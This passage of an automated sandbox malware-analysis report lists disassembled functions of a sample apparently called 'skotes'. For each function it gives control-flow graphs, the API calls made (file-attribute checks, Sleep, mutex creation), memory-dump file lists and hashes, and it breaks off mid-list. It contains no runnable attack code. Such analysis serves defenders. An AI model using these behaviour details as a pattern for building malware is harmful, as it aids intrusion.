                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 09d778b212ce3a0c12c5a88f72f5d041e3a321c00f46a3d6d0cef2e0a36233c3
                                                                                                                                              • Instruction ID: 95f91a6a7f128e57141cb3ae18afd5bb7beb12c4e4fe4e7c33333da1deca30b6
                                                                                                                                              • Opcode Fuzzy Hash: 09d778b212ce3a0c12c5a88f72f5d041e3a321c00f46a3d6d0cef2e0a36233c3
                                                                                                                                              • Instruction Fuzzy Hash: FE3126717042049BEB08DB68DD887ADB7A2EB86314F24862AE014F73D1D77D9A90875A
                                                                                                                                              Function 0040A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1876 40a079-40a099 GetFileAttributesA 1879 40a0c7-40a0e3 1876->1879 1880 40a09b-40a0a7 1876->1880 1881 40a111-40a130 1879->1881 1882 40a0e5-40a0f1 1879->1882 1883 40a0a9-40a0b7 1880->1883 1884 40a0bd-40a0c4 call 41d663 1880->1884 1888 40a132-40a13e 1881->1888 1889 40a15e-40a916 call 4180c0 1881->1889 1886 40a0f3-40a101 1882->1886 1887 40a107-40a10e call 41d663 1882->1887 1883->1884 1890 40a930-40a987 call 436c6a Sleep CreateMutexA 1883->1890 1884->1879 1886->1887 1886->1890 1887->1881 1894 40a140-40a14e 1888->1894 1895 40a154-40a15b call 41d663 1888->1895 1905 40a98e-40a994 1890->1905 1894->1890 1894->1895 1895->1889 1906 40a996-40a998 1905->1906 1907 40a9a7-40a9a8 1905->1907 1906->1907 1908 40a99a-40a9a5 1906->1908 1908->1907 1910 40a9a9-40a9b0 call 436629 1908->1910
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A07C
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: c55d1878aebb8d9cef37dd82cb0a5666884418d319a6168eeb28c5d43d27acc6
                                                                                                                                              • Instruction ID: db90667c79c6d84f4cc63ea4ecbff6d04f35da47fd629eb621b1877855994845
                                                                                                                                              • Opcode Fuzzy Hash: c55d1878aebb8d9cef37dd82cb0a5666884418d319a6168eeb28c5d43d27acc6
                                                                                                                                              • Instruction Fuzzy Hash: 1C3148717003049BEB08DB78DD88BADB772DB86314F24863AE014BB3D1C77D5990865B
                                                                                                                                              Function 0040A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1913 40a1ae-40a1ce GetFileAttributesA 1916 40a1d0-40a1dc 1913->1916 1917 40a1fc-40a218 1913->1917 1920 40a1f2-40a1f9 call 41d663 1916->1920 1921 40a1de-40a1ec 1916->1921 1918 40a246-40a265 1917->1918 1919 40a21a-40a226 1917->1919 1924 40a293-40a916 call 4180c0 1918->1924 1925 40a267-40a273 1918->1925 1922 40a228-40a236 1919->1922 1923 40a23c-40a243 call 41d663 1919->1923 1920->1917 1921->1920 1926 40a935 1921->1926 1922->1923 1922->1926 1923->1918 1931 40a275-40a283 1925->1931 1932 40a289-40a290 call 41d663 1925->1932 1928 40a953-40a987 Sleep CreateMutexA 1926->1928 1929 40a935 call 436c6a 1926->1929 1942 40a98e-40a994 1928->1942 1929->1928 1931->1926 1931->1932 1932->1924 1943 40a996-40a998 1942->1943 1944 40a9a7-40a9a8 1942->1944 1943->1944 1945 40a99a-40a9a5 1943->1945 1945->1944 1947 40a9a9-40a9b0 call 436629 1945->1947
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A1B1
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 396266464-3862687658
                                                                                                                                              • Opcode ID: 1804cf0e98361164bdf5e6ac00f0ce54103a9b5ae5486d41e5866e9644f22e63
                                                                                                                                              • Instruction ID: f462ed77387905a2e2995f090e23c07cd9c0328172b7ec7b47117eea21b7f895
                                                                                                                                              • Opcode Fuzzy Hash: 1804cf0e98361164bdf5e6ac00f0ce54103a9b5ae5486d41e5866e9644f22e63
                                                                                                                                              • Instruction Fuzzy Hash: FB314871B003409BEB08DBA8DD897ADB772AB86314F20867EE014BB3D1D77D5990875A
                                                                                                                                              Function 0040A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134sleepsynchronizationCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0040A2E6
                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
